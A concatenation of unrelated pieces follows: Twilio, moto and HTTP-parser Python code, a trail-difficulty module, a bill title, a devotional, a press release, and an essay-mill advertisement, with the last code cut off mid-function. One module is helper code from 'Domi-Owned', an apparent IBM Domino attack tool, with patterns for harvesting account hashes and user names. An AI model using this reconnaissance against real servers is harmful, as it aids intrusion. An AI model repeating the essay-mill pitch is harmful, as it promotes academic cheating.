        self._uri = '/Assistants/{assistant_sid}/Webhooks/{sid}'.format(**self._solution)

    def fetch(self):
        """Fetch the WebhookInstance from the API.

        :returns: the fetched WebhookInstance
        :rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
        """
        payload = self._version.fetch(method='GET', uri=self._uri, )
        return self._build_instance(payload)

    def update(self, unique_name=values.unset, events=values.unset,
               webhook_url=values.unset, webhook_method=values.unset):
        """Update the WebhookInstance.

        :param unicode unique_name: application-defined unique identifier
        :param unicode events: space-separated events the Webhook subscribes to
        :param unicode webhook_url: URL associated with this Webhook
        :param unicode webhook_method: HTTP method used to call the webhook URL
        :returns: the updated WebhookInstance
        :rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
        """
        # values.of() drops unset parameters from the POST body.
        data = values.of({
            'UniqueName': unique_name,
            'Events': events,
            'WebhookUrl': webhook_url,
            'WebhookMethod': webhook_method,
        })
        payload = self._version.update(method='POST', uri=self._uri, data=data, )
        return self._build_instance(payload)

    def _build_instance(self, payload):
        """Wrap an API payload in a WebhookInstance bound to this context's path."""
        return WebhookInstance(
            self._version,
            payload,
            assistant_sid=self._solution['assistant_sid'],
            sid=self._solution['sid'],
        )

    def delete(self):
        """Delete the WebhookInstance.

        :returns: True if delete succeeds, False otherwise
        :rtype: bool
        """
        return self._version.delete(method='DELETE', uri=self._uri, )

    def __repr__(self):
        """Return a machine-friendly representation."""
        details = ['{}={}'.format(key, value) for key, value in self._solution.items()]
        return '<Twilio.Autopilot.V1.WebhookContext {}>'.format(' '.join(details))
# NOTE: auto-generated Twilio client code; structure intentionally mirrors the
# generator's output.
class WebhookInstance(InstanceResource):
    """ PLEASE NOTE that this class contains preview products that are subject
    to change. Use them with caution. If you currently do not have developer
    preview access, please contact help@twilio.com. """

    def __init__(self, version, payload, assistant_sid, sid=None):
        """
        Initialize the WebhookInstance

        :returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
        :rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
        """
        super(WebhookInstance, self).__init__(version)

        # Marshaled Properties
        self._properties = {
            'url': payload.get('url'),
            'account_sid': payload.get('account_sid'),
            'date_created': deserialize.iso8601_datetime(payload.get('date_created')),
            'date_updated': deserialize.iso8601_datetime(payload.get('date_updated')),
            'assistant_sid': payload.get('assistant_sid'),
            'sid': payload.get('sid'),
            'unique_name': payload.get('unique_name'),
            'events': payload.get('events'),
            'webhook_url': payload.get('webhook_url'),
            'webhook_method': payload.get('webhook_method'),
        }

        # Context: built lazily by _proxy on first use. When no explicit sid is
        # given (e.g. instances built from a list page), fall back to the sid
        # carried in the payload.
        self._context = None
        self._solution = {'assistant_sid': assistant_sid, 'sid': sid or self._properties['sid'], }

    @property
    def _proxy(self):
        """
        Generate an instance context for the instance, the context is capable of
        performing various actions.  All instance actions are proxied to the context

        :returns: WebhookContext for this WebhookInstance
        :rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
        """
        if self._context is None:
            self._context = WebhookContext(
                self._version,
                assistant_sid=self._solution['assistant_sid'],
                sid=self._solution['sid'],
            )
        return self._context

    @property
    def url(self):
        """
        :returns: The absolute URL of the Webhook resource
        :rtype: unicode
        """
        return self._properties['url']

    @property
    def account_sid(self):
        """
        :returns: The SID of the Account that created the resource
        :rtype: unicode
        """
        return self._properties['account_sid']

    @property
    def date_created(self):
        """
        :returns: The RFC 2822 date and time in GMT when the resource was created
        :rtype: datetime
        """
        return self._properties['date_created']

    @property
    def date_updated(self):
        """
        :returns: The RFC 2822 date and time in GMT when the resource was last updated
        :rtype: datetime
        """
        return self._properties['date_updated']

    @property
    def assistant_sid(self):
        """
        :returns: The SID of the Assistant that is the parent of the resource
        :rtype: unicode
        """
        return self._properties['assistant_sid']

    @property
    def sid(self):
        """
        :returns: The unique string that identifies the resource
        :rtype: unicode
        """
        return self._properties['sid']

    @property
    def unique_name(self):
        """
        :returns: An application-defined string that uniquely identifies the resource
        :rtype: unicode
        """
        return self._properties['unique_name']

    @property
    def events(self):
        """
        :returns: The list of space-separated events that this Webhook is subscribed to.
        :rtype: unicode
        """
        return self._properties['events']

    @property
    def webhook_url(self):
        """
        :returns: The URL associated with this Webhook.
        :rtype: unicode
        """
        return self._properties['webhook_url']

    @property
    def webhook_method(self):
        """
        :returns: The method used when calling the webhook's URL.
        :rtype: unicode
        """
        return self._properties['webhook_method']

    def fetch(self):
        """
        Fetch the WebhookInstance

        :returns: The fetched WebhookInstance
        :rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
        """
        # Delegated to the lazily-created WebhookContext.
        return self._proxy.fetch()

    def update(self, unique_name=values.unset, events=values.unset,
               webhook_url=values.unset, webhook_method=values.unset):
        """
        Update the WebhookInstance

        :param unicode unique_name: An application-defined string that uniquely identifies the resource
        :param unicode events: The list of space-separated events that this Webhook will subscribe to.
        :param unicode webhook_url: The URL associated with this Webhook.
        :param unicode webhook_method: The method to be used when calling the webhook's URL.

        :returns: The updated WebhookInstance
        :rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
        """
        return self._proxy.update(
            unique_name=unique_name,
            events=events,
            webhook_url=webhook_url,
            webhook_method=webhook_method,
        )

    def delete(self):
        """
        Deletes the WebhookInstance

        :returns: True if delete succeeds, False otherwise
        :rtype: bool
        """
        return self._proxy.delete()

    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
        return '<Twilio.Autopilot.V1.WebhookInstance {}>'.format(context)
|
1977 House Bill 2372. Resolve Providing For Study Of Nursing Home Rate Setting Procedures.
Title 1977 House Bill 2372. Resolve Providing For Study Of Nursing Home Rate Setting Procedures.
|
# Copyright (c) 2017, Brandan Geise [coldfusion]
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging.handlers
import re
import sys
import tqdm
class Utilities(object):
    """
    Utility functions shared across the application: default HTTP headers,
    pre-compiled regexes for Domino response parsing, logging setup, and
    small input-handling helpers.
    """

    HEADERS = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close'
    }

    # Pre-compiled patterns; compiled once at class-definition time so they
    # are not rebuilt on every use.
    URL_REGEX = re.compile(r'(https?:\/\/[\d\w.:-]+)', re.I)
    FORM_REGEX = re.compile(r'method[\'\"= ]{1,4}post[\'\"]?', re.I)
    OPEN_REGEX = re.compile(r'name[\'\"= ]{1,4}notesview[\'\"]?', re.I)
    ACCOUNT_REGEX = re.compile(r'/([a-f0-9]{32}/[a-f0-9]{32})', re.I)
    USER_FIELD_REGEX = re.compile(r'user.+', re.I)
    REDIRECT_FIELD_REGEX = re.compile(r'redirect.+', re.I)
    NAMES_REGEX = re.compile(r'name[\'\"= ]{1,4}notesview[\'\"]?', re.I)
    WEBADMIN_REGEX = re.compile(r'<title>.*administration</title>', re.I)
    RESTRICTED_REGEX = re.compile(r'(notes exception|not authorized)', re.I)
    VERSION_REGEX = re.compile(r'(?:version|domino administrator|domino|release)[=":\s]{0,4}([\d.]+)(?:\s|\")?', re.I)
    LINUX_USER_REGEX = re.compile(r'([a-z0-9-_].+):(.+)', re.I)
    WINDOWS_USER_REGEX = re.compile(r'(.+)\\(.+)', re.I)
    PATH_REGEX = re.compile(r'DataDirectory\s*=\s*\'(.+)\';', re.I)

    def set_logging(self):
        """
        Configure the basic logging environment for the application and
        return the shared 'DomiOwned' logger.

        A handler is attached only when none exists yet, so calling this
        more than once no longer produces duplicated log lines (the original
        added a new StreamHandler on every call).
        """
        logger = logging.getLogger('DomiOwned')
        logger.setLevel(logging.DEBUG)

        if not logger.handlers:
            handler = logging.StreamHandler()
            handler.setFormatter(CustomLoggingFormatter())
            logger.addHandler(handler)

        return logger

    def parse_credentials(self, value):
        """
        Handle credentials if value is None: normalize a missing credential
        to an empty string so later string operations are safe.
        """
        return '' if value is None else value

    def check_url(self, url):
        """
        Check for a valid base URL and return the scheme://host[:port] part.

        Logs an error and exits the process when the URL does not match.
        NOTE(review): relies on self.logger being assigned elsewhere before
        an invalid URL is seen -- confirm against the caller.
        """
        # Search once and reuse the match (the original ran the regex twice).
        match = self.URL_REGEX.search(url)
        if match:
            return match.group(1)
        self.logger.error('Invalid URL provided')
        sys.exit()

    def setup_progress(self, total):
        """
        Setup and return a tqdm progress bar for `total` work items.
        """
        progress_bar = tqdm.tqdm(
            total=total,
            desc="Progress",
            smoothing=0.5,
            bar_format='{desc}{percentage:3.0f}%|{bar}|({n_fmt}/{total_fmt})|{elapsed} '
        )
        return progress_bar
class CustomLoggingFormatter(logging.Formatter):
    """
    Formatter that prefixes each record with a colored status tag:
    [*] debug, [+] info, [!] warning, [-] error.
    """

    DEBUG_FORMAT = "\033[1m\033[34m[*]\033[0m %(msg)s"
    INFO_FORMAT = "\033[1m\033[32m[+]\033[0m %(msg)s"
    WARN_FORMAT = "\033[1m\033[33m[!]\033[0m %(msg)s"
    ERROR_FORMAT = "\033[1m\033[31m[-]\033[0m %(msg)s"

    def __init__(self):
        super().__init__(fmt="%(levelno)d: %(msg)s", datefmt=None, style='%')

    def format(self, record):
        """Render the record with the level-specific format, then restore."""
        saved_fmt = self._style._fmt
        # Dispatch table replaces the if/elif chain; unknown levels fall
        # back to the format already in place (same as the original).
        level_formats = {
            logging.DEBUG: self.DEBUG_FORMAT,
            logging.INFO: self.INFO_FORMAT,
            logging.WARN: self.WARN_FORMAT,
            logging.ERROR: self.ERROR_FORMAT,
        }
        self._style._fmt = level_formats.get(record.levelno, saved_fmt)
        rendered = logging.Formatter.format(self, record)
        self._style._fmt = saved_fmt
        return rendered
class Banner(object):
    """
    Domi-Owned visual banner.
    """

    # ASCII-art logo printed at startup.  The doubled backslash is an escape
    # sequence that renders as a single backslash in the output.
    SHOW = """
 __________ __________ __________
| |\| | |\\
| * * ||| * * * | * ||
| * * ||| | * ||
| * * ||| * * * | * ||
|__________|||__________|__________||
| || `---------------------`
| * * ||
| ||
| * * ||
|__________||
`----------`
IBM/Lotus Domino OWNage
"""
|
Sometimes God sends a prophet before a deliverer (cf. Judges 6:7-10 and 11ff.). The main task of a prophet is to speak the truth to power, whereas the main task of a deliverer is to act with God’s help to move the people in a different (more faithful) direction. Sometimes God calls the same person to act as prophet and deliverer, but when this is not the case the prophet is often hated. Why? Because they deliver a painful message to the people that discloses the gap between where they are and where God wants them to be, forcing them to sit in the discomfort of the gap without quick solutions. No one likes to sit in the discomfort created by the tension between what is and what should be. By the time the prophetic truth sinks in and the deliverer comes, many are ready to kill the prophet! It is more glorious to help people solve their problems than to show them their problems, but the role of prophet has always been essential in God’s great rescue mission of this world. I often wonder if one of the main problems in mainline Protestantism today is its lack of prophets (or our refusal to hear the message of the prophets). Take a few minutes during your devotional time to pray for God’s prophets today.
|
from __future__ import unicode_literals
from moto.core.responses import BaseResponse
class VPCPeeringConnections(BaseResponse):
    """
    Dispatches mocked EC2 VPC-peering API actions to the backend and
    renders the matching XML response template for each action.
    """

    def create_vpc_peering_connection(self):
        """Create a peering between the requester VPC and the peer VPC."""
        requester = self.ec2_backend.get_vpc(self._get_param('VpcId'))
        accepter = self.ec2_backend.get_vpc(self._get_param('PeerVpcId'))
        peering = self.ec2_backend.create_vpc_peering_connection(requester, accepter)
        return self.response_template(
            CREATE_VPC_PEERING_CONNECTION_RESPONSE).render(vpc_pcx=peering)

    def delete_vpc_peering_connection(self):
        """Delete the peering named by VpcPeeringConnectionId."""
        peering = self.ec2_backend.delete_vpc_peering_connection(
            self._get_param('VpcPeeringConnectionId'))
        return self.response_template(
            DELETE_VPC_PEERING_CONNECTION_RESPONSE).render(vpc_pcx=peering)

    def describe_vpc_peering_connections(self):
        """List every peering connection known to the backend."""
        all_peerings = self.ec2_backend.get_all_vpc_peering_connections()
        return self.response_template(
            DESCRIBE_VPC_PEERING_CONNECTIONS_RESPONSE).render(vpc_pcxs=all_peerings)

    def accept_vpc_peering_connection(self):
        """Accept a pending peering request."""
        peering = self.ec2_backend.accept_vpc_peering_connection(
            self._get_param('VpcPeeringConnectionId'))
        return self.response_template(
            ACCEPT_VPC_PEERING_CONNECTION_RESPONSE).render(vpc_pcx=peering)

    def reject_vpc_peering_connection(self):
        """Reject a pending peering request; response carries no peering data."""
        self.ec2_backend.reject_vpc_peering_connection(
            self._get_param('VpcPeeringConnectionId'))
        return self.response_template(
            REJECT_VPC_PEERING_CONNECTION_RESPONSE).render()
CREATE_VPC_PEERING_CONNECTION_RESPONSE = """
<CreateVpcPeeringConnectionResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<vpcPeeringConnection>
<vpcPeeringConnectionId>{{ vpc_pcx.id }}</vpcPeeringConnectionId>
<requesterVpcInfo>
<ownerId>777788889999</ownerId>
<vpcId>{{ vpc_pcx.vpc.id }}</vpcId>
<cidrBlock>{{ vpc_pcx.vpc.cidr_block }}</cidrBlock>
</requesterVpcInfo>
<accepterVpcInfo>
<ownerId>123456789012</ownerId>
<vpcId>{{ vpc_pcx.peer_vpc.id }}</vpcId>
</accepterVpcInfo>
<status>
<code>initiating-request</code>
<message>Initiating request to {accepter ID}.</message>
</status>
<expirationTime>2014-02-18T14:37:25.000Z</expirationTime>
<tagSet/>
</vpcPeeringConnection>
</CreateVpcPeeringConnectionResponse>
"""
DESCRIBE_VPC_PEERING_CONNECTIONS_RESPONSE = """
<DescribeVpcPeeringConnectionsResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<vpcPeeringConnectionSet>
{% for vpc_pcx in vpc_pcxs %}
<item>
<vpcPeeringConnectionId>{{ vpc_pcx.id }}</vpcPeeringConnectionId>
<requesterVpcInfo>
<ownerId>777788889999</ownerId>
<vpcId>{{ vpc_pcx.vpc.id }}</vpcId>
<cidrBlock>{{ vpc_pcx.vpc.cidr_block }}</cidrBlock>
</requesterVpcInfo>
<accepterVpcInfo>
<ownerId>123456789012</ownerId>
<vpcId>{{ vpc_pcx.peer_vpc.id }}</vpcId>
</accepterVpcInfo>
<status>
<code>{{ vpc_pcx._status.code }}</code>
<message>{{ vpc_pcx._status.message }}</message>
</status>
<expirationTime>2014-02-17T16:00:50.000Z</expirationTime>
<tagSet/>
</item>
{% endfor %}
</vpcPeeringConnectionSet>
</DescribeVpcPeeringConnectionsResponse>
"""
DELETE_VPC_PEERING_CONNECTION_RESPONSE = """
<DeleteVpcPeeringConnectionResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<return>true</return>
</DeleteVpcPeeringConnectionResponse>
"""
ACCEPT_VPC_PEERING_CONNECTION_RESPONSE = """
<AcceptVpcPeeringConnectionResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<vpcPeeringConnection>
<vpcPeeringConnectionId>{{ vpc_pcx.id }}</vpcPeeringConnectionId>
<requesterVpcInfo>
<ownerId>123456789012</ownerId>
<vpcId>{{ vpc_pcx.vpc.id }}</vpcId>
<cidrBlock>{{ vpc_pcx.vpc.cidr_block }}</cidrBlock>
</requesterVpcInfo>
<accepterVpcInfo>
<ownerId>777788889999</ownerId>
<vpcId>{{ vpc_pcx.peer_vpc.id }}</vpcId>
<cidrBlock>{{ vpc_pcx.peer_vpc.cidr_block }}</cidrBlock>
</accepterVpcInfo>
<status>
<code>{{ vpc_pcx._status.code }}</code>
<message>{{ vpc_pcx._status.message }}</message>
</status>
<tagSet/>
</vpcPeeringConnection>
</AcceptVpcPeeringConnectionResponse>
"""
REJECT_VPC_PEERING_CONNECTION_RESPONSE = """
<RejectVpcPeeringConnectionResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<return>true</return>
</RejectVpcPeeringConnectionResponse>
"""
|
It used to happen to me every time our tutor set us an essay, I would run out of time before I had even started to write. Every time I needed to write I would have to work, I would be needed for something by my family or any one of 100 different things that needed to be done. It was just impossible to get some quality time to spend on my essays, but without the time the essays that I submitted were far from the best that I could have produced. What I needed was an affordable essay writing service, not a cheap essay as such but a cheap service to provide a good quality essay that would keep my tutor happy.
There are cheap writing services and there are cheap writing services; some are cheap because the product is cheap. I have seen services that will provide you with a direct copy of another essay or a patchwork essay made up from several other essays and articles; whichever way they do it, copying is a sure way to get yourself in some serious trouble. When you try to find cheap essay writing services, you must ensure that they are completely free of any form of plagiarism. Cheap essays may also be very poor quality; some companies keep the costs reduced by outsourcing all of their writing to countries where they only have to pay a couple of dollars each day, countries where English is not the first language. The result of this is that the essays are written very poorly in far from perfect English. So what you really want is a company that provides cheap essays by being efficient at what they do; cheap in price but high in quality.
The Custom Essay Writing Service may not be the absolute cheapest service that you could find but it will provide you with a quality cheap essay. Their writers all originate from countries such as the UK where English is spoken as a first language. They employ writers who have a huge amount of essay writing experience and higher level qualifications in the subjects that you wish to write about. You can therefore be sure that they will produce high quality essays which are on subject and in perfect English and grammar. All essays are also checked for copying as well as for their quality before they are finally released to you for use. You can be confident that their service will not only satisfy you but delight you, so if you need cheap essays contact them today for a perfect quality essay.
|
# -*- coding: utf-8 -*-
from django.utils.encoding import force_unicode
from django.utils.translation import ugettext_lazy as _
class Mscale(object):
    """
    M scale, describing the difficulty of a single muni trail section.

    Instances compare equal to other Mscale instances and to plain numbers
    with the same level value.  NOTE: this module is Python 2 code (it uses
    the builtin ``cmp`` and ``unicode``).
    """

    # Valid difficulty levels, in half steps from M0 to M5.
    levels = (0.0, 0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0)

    def __init__(self, *args, **kwargs):
        """
        initial values can be provided via kwargs.
        :param number: difficulty level, e.g. 2 for M2
        :type number: int
        :param underground: description of the trail underground
        :type underground: str.
        :param slope: slope
        :param obstacles: list of obstacles
        :type obstacles: list
        :param characteristics: list of other characteristics
            that describe the trail section
        :type characteristics: list
        """
        self.number = float(kwargs.pop(u"number", 0))
        self.underground = kwargs.pop(u"underground", "")
        self.slope = kwargs.pop(u"slope", "")
        self.obstacles = kwargs.pop(u"obstacles", [])
        self.characteristics = kwargs.pop(u"characteristics", [])

    def __unicode__(self):
        # NOTE(review): by operator precedence this is
        # (u"M%s" % self.number) or u'M'; the formatted string is always
        # truthy, so the u'M' fallback can never trigger.  Possibly intended
        # as u"M%s" % (self.number or u'M') -- confirm before changing.
        return force_unicode(u"M%s" % self.number or u'M')

    def __str__(self):
        return str(self.__unicode__())

    def __eq__(self, other):
        # Equal to Mscales and bare numbers with the same level; anything
        # else is simply unequal (the TypeError below was disabled).
        if isinstance(other, Mscale):
            return self.number == other.number
        elif isinstance(other, (int, float)):
            return self.number == other
        else:
            return False
            # raise TypeError(u"Cannot compare Mscale object with %s" % str(other))

    def __ne__(self, other):
        return not self.__eq__(other)

    def __cmp__(self, other):
        """
        Also allows comparisons between mscale instances and numbers.

        Python 2 only: relies on the builtin cmp(); unlike __eq__, an
        unsupported operand raises TypeError here.
        """
        if (isinstance(other, Mscale)):
            return cmp(self.number, other.number)
        elif (isinstance(other, int) or isinstance(other, float)):
            return cmp(self.number, other)
        else:
            raise TypeError(_(u"Cannot compare Mscale object with {0}").format(other))

    def __hash__(self):
        # Hash on the textual form ("M2.0"), keeping instances usable as
        # dict keys.  Python 2 only: uses the builtin unicode().
        return hash(unicode(self))
# Canonical M-scale instances keyed by level number.  Whole-number levels
# carry full descriptions; the half steps (0.5, 1.5, ...) are intermediate
# levels defined only by their number.
MSCALES = {}
MSCALES[0] = Mscale(number=0.0,
                    underground=_(u"pavement or solid soil/compact gravel"),
                    slope="< 20 %",
                    obstacles=[_(u"no obstacles")],
                    characteristics=[_(u"90° turns within > 2 m and with slope < 10 %")]
                    )
MSCALES[0.5] = Mscale(number=0.5)
MSCALES[1] = Mscale(number=1.0,
                    underground=_(u"partly loose soil/gravel"),
                    slope="< 40 %",
                    obstacles=[_(u"small obstacles, approx. 5cm high (small stones, flat roots)"),
                               _(u"single 15 cm steps")],
                    characteristics=[_(u"90° turn within > 1 m and with slope < 20 %")]
                    )
MSCALES[1.5] = Mscale(number=1.5)
# NOTE(review): the first obstacle string below is missing a closing
# parenthesis after "roots".  Fixing it would change the gettext msgid and
# orphan existing translations, so it is left as-is.
MSCALES[2] = Mscale(number=2.0,
                    underground=_(u"loose soil/gravel"),
                    slope="< 60 %",
                    obstacles=[_(u"obstacles, approx. 10 cm high (stones, roots"),
                               _(u"single 30 cm steps")
                               ],
                    characteristics=[_(u"90° turn within > 0.5 m and with slope < 30 %")]
                    )
MSCALES[2.5] = Mscale(number=2.5)
MSCALES[3] = Mscale(number=3.0,
                    underground=_(u"loose soil with loose stones (size of few cm)"),
                    slope="< 80 %",
                    obstacles=[_(u"obstacles that are approx 20cm high (stones, roots)"),
                               _(u"several irregular steps, approx. 20 cm each"),
                               _(u"drops < 1 m"),
                               _(u"gaps < 0.5 m")],
                    characteristics=[_(u"135° turn within ~ 0.5 m and with slope < 40 %")]
                    )
MSCALES[3.5] = Mscale(number=3.5)
MSCALES[4] = Mscale(number=4.0,
                    underground=_(u"very loose/slippery soil with loose stones (size of several cm)"),
                    slope="< 100 %",
                    obstacles=[_(u"big obstacles (stones, logs ~ 30 cm)"),
                               _(u"several irregular steps ~ 30 cm each"),
                               _(u"drops < 1.5 m"),
                               _(u"gaps < 1 m")],
                    characteristics=[_(u"135° turn within ~ 0.5 m and with slope < 60 %")]
                    )
MSCALES[4.5] = Mscale(number=4.5)
MSCALES[5] = Mscale(number=5.0,
                    underground=_(u"very loose/slippery soil with loose stones (size of several cm)"),
                    slope="> 100 %",
                    obstacles=[_(u"very big obstacles (stones, logs ~ 40 cm)"),
                               _(u"several irregular steps ~ 40 cm each"),
                               _(u"drops > 1.5 m, gaps > 1 m")],
                    characteristics=[_(u"135° turn within ~ 0.5 m and with slope < 80 %")]
                    )
# Choices for Django model/form fields: (value, label) pairs where whole
# numbers render without the trailing ".0" (e.g. "M 2", "M 2.5").
MSCALE_CHOICES = tuple((m, "M %s" % str(m).replace(".0", "")) for m in Mscale.levels)
|
Every day, our world grows more and more connected. This is something the electronics specialist BFFT from Gaimersheim near the Bavarian city of Ingolstadt recognized early on. Consequently, the company has been developing digital connectivity technology for cars for many years. Now, for the first time, BFFT has presented its portfolio at a global connectivity trade fair – Mobile World Congress in Barcelona. At the booth of parent company EDAG Engineering GmbH, the BFFT specialists showcased their innovative CShark automation tool as well as other highlights.
(Gaimersheim, March 8, 2018) – The more digital our lives become, the more challenging it is to connect all these services with each other. Smartphones with different operating systems have to be understood by different devices and work together in a global system. This applies especially to the automotive industry, where the question of how to achieve valid end-to-end protection of continuously evolving functions presents a particularly complex challenge. It is precisely here that BFFT and EDAG have positioned themselves as a strong team – at the interface between the collected vehicle data and the digital services derived from it. After all, in today’s world, data is the new currency.
In Barcelona, BFFT presented its CShark automation framework at the booth of its parent company EDAG. This basic modular framework allows customers to automatically test the various components of an infotainment system both individually and in the complete end-to-end chain. From simulation of the entire vehicle through to the subsequent comparison of the simulated data with a front end, BFFT covers the full security chain for in-vehicle online services. These tests can be conveniently managed and launched from a web portal or an app. “Customers can also use them to directly evaluate and share the test results,” explains Markus Fichtner, CEO of BFFT. As well as integrating software and apps into the automation framework, BFFT also offers the customized incorporation of hardware components into its proprietary system. CShark has been used in regular production since 2016 and is currently employed in the end-to-end protection of various mobile online services in the automobile sector.
BFFT has also positioned itself as an expert partner in the sphere of big data. Together with EDAG, the electronics specialists showed curious visitors how continuously collected vehicle data can be productively applied and marketed in the future. For example, machine learning and artificial intelligence could be used to optimize digital service applications, such as weather services or the real-time navigation to free parking spaces. In such scenarios, drivers would of course decide for themselves what data they want to release and what they want to withhold.
Our sincerest thanks to all the visitors and guests who showed interest in our products. BFFT is already looking forward to the next Mobile World Congress in 2019.
|
# -*- coding: utf-8 -*-
"""
pycohttpparser/api
~~~~~~~~~~~~~~~~~~
Defines the public API to pycohttpparser.
"""
from collections import namedtuple
from ._pycohttpparser import lib, ffi
# Parsed HTTP request: `method` and `path` are zero-copy slices of the input
# buffer, `headers` is a list of (name, value) pairs, and `consumed` is the
# parser's return value for a successful parse.
Request = namedtuple(
    'Request', ['method', 'path', 'minor_version', 'headers', 'consumed']
)
# Parsed HTTP response: like Request, but with a numeric `status` and the
# reason phrase in `msg`.
Response = namedtuple(
    'Response', ['status', 'msg', 'minor_version', 'headers', 'consumed']
)
class ParseError(Exception):
    """
    An invalid HTTP message was passed to the parser.

    Raised by Parser.parse_request and Parser.parse_response when the
    underlying picohttpparser call reports a malformed message.
    """
class Parser(object):
    """
    A single HTTP parser object. This object can parse HTTP requests and
    responses using picohttpparser.

    This object is not thread-safe, and it does maintain state that is shared
    across parsing requests. For this reason, make sure that access to this
    object is synchronized if you use it across multiple threads.
    """

    def __init__(self):
        # Store some instance variables. This represents essentially static
        # allocations that are used repeatedly in some of the parsing code.
        # This avoids the overhead of repeatedly allocating large chunks of
        # memory each time a parse is called.

        # Allocate all the data that will come out of the method.
        # NOTE(review): the request-method and response-message output slots
        # (and their lengths) deliberately share one allocation -- presumably
        # safe because one Parser never runs a request parse and a response
        # parse at the same time; confirm before using concurrently.
        self._method = self._msg = ffi.new("char **")
        self._method_len = self._msg_len = ffi.new("size_t *")
        self._path = ffi.new("char **")
        self._path_len = ffi.new("size_t *")
        self._minor_version = ffi.new("int *")
        self._status = ffi.new("int *")

        # Allow space for 1000 headers. Anything more is clearly nonsense.
        self._header_count = 1000
        self._headers = ffi.new("struct phr_header [1000]")
        self._num_headers = ffi.new("size_t *", self._header_count)

    def parse_request(self, buffer):
        """
        Parses a single HTTP request from a buffer.

        :param buffer: A ``memoryview`` object wrapping a buffer containing a
            HTTP request.
        :returns: A :class:`Request <pycohttpparser.api.Request>` object, or
            ``None`` if there is not enough data in the buffer.
        :raises ParseError: if the buffer holds a malformed HTTP request.
        """
        # Allocate function inputs
        buffer_size = ffi.cast("size_t", len(buffer))
        phr_buffer = ffi.new("char []", buffer.tobytes())
        last_len = ffi.cast("size_t", 0)

        # Reset the header count.  phr_parse_request treats this as in/out:
        # capacity on entry, actual header count on exit.
        self._num_headers[0] = self._header_count

        # Do the parse.
        pret = lib.phr_parse_request(
            phr_buffer,
            buffer_size,
            self._method,
            self._method_len,
            self._path,
            self._path_len,
            self._minor_version,
            self._headers,
            self._num_headers,
            last_len
        )

        # Check for insufficient data or parse errors: -2 means the message
        # is incomplete, -1 means it is malformed; any other value is the
        # number of bytes consumed (returned in `consumed`).
        if pret == -2:
            return None
        elif pret == -1:
            raise ParseError("Invalid message")

        # If we got here we have a full request. We need to return useful
        # data. A useful trick here: all the returned char pointers are
        # pointers into buffer. This means we can use them as offsets and
        # return memoryviews to their data. Snazzy, right?
        method = b''
        path = b''
        minor_version = -1

        # cffi pointer arithmetic: subtracting the base of phr_buffer from
        # each output pointer yields an offset valid into `buffer` too,
        # since phr_buffer is a byte-for-byte copy of it.
        offset = self._method[0] - phr_buffer
        element_len = self._method_len[0]
        method = buffer[offset:offset+element_len]

        offset = self._path[0] - phr_buffer
        element_len = self._path_len[0]
        path = buffer[offset:offset+element_len]

        minor_version = self._minor_version[0]

        # We can create the Request object now, because all the scalar fields
        # are ready. We can put the headers into a list already hung from it.
        req = Request(method, path, minor_version, [], pret)
        for header in self._build_headers(phr_buffer, buffer):
            req.headers.append(header)

        return req

    def parse_response(self, buffer):
        """
        Parses a single HTTP response from a buffer.

        :param buffer: A ``memoryview`` object wrapping a buffer containing a
            HTTP response.
        :returns: A :class:`Response <pycohttpparser.api.Response>` object, or
            ``None`` if there is not enough data in the buffer.
        :raises ParseError: if the buffer holds a malformed HTTP response.
        """
        # Allocate function inputs
        buffer_size = ffi.cast("size_t", len(buffer))
        phr_buffer = ffi.new("char []", buffer.tobytes())
        last_len = ffi.cast("size_t", 0)

        # Reset the header count (in/out parameter, as in parse_request).
        self._num_headers[0] = self._header_count

        # Do the parse.
        pret = lib.phr_parse_response(
            phr_buffer,
            buffer_size,
            self._minor_version,
            self._status,
            self._msg,
            self._msg_len,
            self._headers,
            self._num_headers,
            last_len
        )

        # Check for insufficient data or parse errors (same convention as
        # parse_request: -2 incomplete, -1 malformed).
        if pret == -2:
            return None
        elif pret == -1:
